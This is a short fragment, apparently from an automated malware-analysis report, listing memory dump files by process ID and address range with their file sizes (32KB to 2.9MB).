                                                                                                                                                                                                                                  • memory/2760-408-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    172KB

                                                                                                                                                                                                                                  • memory/2888-42-0x0000000000B00000-0x0000000000B08000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                  • memory/3676-2097-0x00000000008C0000-0x00000000008C8000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                  • memory/4456-2069-0x0000000000CD0000-0x0000000000D22000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    328KB

                                                                                                                                                                                                                                  • memory/4924-802-0x0000000000870000-0x0000000000878000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                  • memory/4924-801-0x0000000019F00000-0x000000001A1E2000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    2.9MB